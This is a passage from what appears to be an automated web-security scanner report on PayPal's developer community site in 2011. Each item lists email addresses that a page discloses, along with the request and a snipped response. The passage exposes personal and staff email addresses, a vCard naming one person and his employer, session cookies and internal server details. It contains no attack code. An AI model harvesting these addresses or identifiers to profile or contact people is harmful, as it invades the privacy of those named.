Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:paypal@your-domain.com">paypal@your-domain.com</a>
...[SNIP]...

8.15. https://www.x.com/docs/DOC-1551

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following email address was disclosed in the response:

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:dlajoie66@aol.com">dlajoie66@aol.com</a>
...[SNIP]...

8.16. https://www.x.com/docs/DOC-1613

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:paypro_1301916441_biz@bambeeq.com">paypro_1301916441_biz@bambeeq.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:xxxxx_1305510764_per@gmail.com">xxxxx_1305510764_per@gmail.com</a>
...[SNIP]...

8.17. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:payflowbeta@paypal.com">payflowbeta@paypal.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com">=Joe.Smith@anyemail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com">Joe.Smith@anyemail.com</a>
...[SNIP]...

8.18. https://www.x.com/message/198017

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following email address was disclosed in the response:

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:business=book_0123456789_biz@isp.net/">business=book_0123456789_biz@isp.net/</a>
...[SNIP]...

8.19. https://www.x.com/message/212753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following email address was disclosed in the response:

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333037353b312c35333437393b312c35333631303b312c35333539323b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b312c35333638373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:email=merch_1309501980_biz@seneca-global.com">email=merch_1309501980_biz@seneca-global.com</a>
...[SNIP]...

8.20. https://www.x.com/message/213865

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307099300_biz@gmail.com">codehe_1307099300_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehecode@gmail.com">codehecode@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small active_link" href="mailto:codehe_1307339868_biz@gmail.com">
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307339868_biz@gmail.com">
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehecode@gmail.com">codehecode@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:codehe_1307339868_biz@gmail.com">codehe_1307339868_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small active_link" href="mailto:filthy_1308141645_per@gmail.com">filthy_1308141645_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:filthy_1308141865_biz@gmail.com">filthy_1308141865_biz@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:seller_1311232257_biz@gmail.com">seller_1311232257_biz@gmail.com</a>
...[SNIP]...

8.21. https://www.x.com/message/214902

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following email address was disclosed in the response:

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:hitesh_1312610572_per@gmail.com">hitesh_1312610572_per@gmail.com</a>
...[SNIP]...

8.22. https://www.x.com/message/215254

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com">contact@XXXXXXX.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com">contact@YYYYYYY.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com">contact@XXXXXXX.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com">contact@YYYYYYY.com</a>
...[SNIP]...

8.23. https://www.x.com/message/215291

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:akhi.p_1272864268_per@gmail.com">akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:User&amp;notify_version=3.0&amp;custom=&amp;payer_status=verified&amp;business=akhi.p_1272864268_per@gmail.com">User&amp;notify_version=3.0&amp;custom=&amp;payer_status=verified&amp;business=akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:Jose&amp;quantity=1&amp;payer_email=akhile_1242918801_per@cubettech.com">Jose&amp;quantity=1&amp;payer_email=akhile_1242918801_per@cubettech.com</a>
...[SNIP]...
href="mailto:&amp;verify_sign=Az8BELGp90v9Bz5-R7AT7rZ4ePtgA2Y.xzE-cEw3vIo7ktKgCn16cEmT&amp;txn_id=7Y89480459745843E&amp;payment_type=instant&amp;last_name=User&amp;address_state=CA&amp;receiver_email=akhi.p_1272864268_per@gmail.com">&amp;verify_sign=Az8BELGp90v9Bz5-R7AT7rZ4ePtgA2Y.xzE-cEw3vIo7ktKgCn16cEmT&amp;txn_id=7Y89480459745843E&amp;payment_type=instant&amp;last_name=User&amp;address_state=CA&amp;receiver_email=akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:xxxx@xxxx.com&amp;quot;/">xxxx@xxxx.com"/</a>
...[SNIP]...

8.24. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following email address was disclosed in the response:

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
naveedanwar@gmail.com
</span>
...[SNIP]...

8.25. https://www.x.com/people/BaldGeek.vcf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek.vcf

Issue detail

The following email address was disclosed in the response:

Request

GET /people/BaldGeek.vcf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/x-vcard;charset=UTF-8
Content-Language: en-US
JP: D=5452 t=1313157111270263
Vary: User-Agent
Connection: close

BEGIN:VCARD
VERSION:3.0
FN:Naveed Anwar
ORG:PayPal
EMAIL;TYPE=internet:naveedanwar@gmail.com
TZ:Pacific Standard Time
URL:http://x.com
END:VCARD

8.26. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following email address was disclosed in the response:

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
csherman@paypal.com
</span>
...[SNIP]...

8.27. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following email address was disclosed in the response:

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a id="web_viewprofile_anchor_email" href="mailto:sujamthe@paypal.com" class="email">sujamthe@paypal.com</a>
...[SNIP]...

8.28. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following email address was disclosed in the response:

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
service@angelleye.com
</span>
...[SNIP]...

8.29. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following email address was disclosed in the response:

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a id="web_viewprofile_anchor_email" href="mailto:sliddicoat@encoresystems.net" class="email">sliddicoat@encoresystems.net</a>
...[SNIP]...

8.30. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=354 t=1313114380766811
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.31. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654809
JP: D=647 t=1313156390522448
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.32. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/docs/DOC-1106
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 981912
JP: D=369 t=1313156410569291
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.33. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:26 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=18063 t=1313114366859700
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
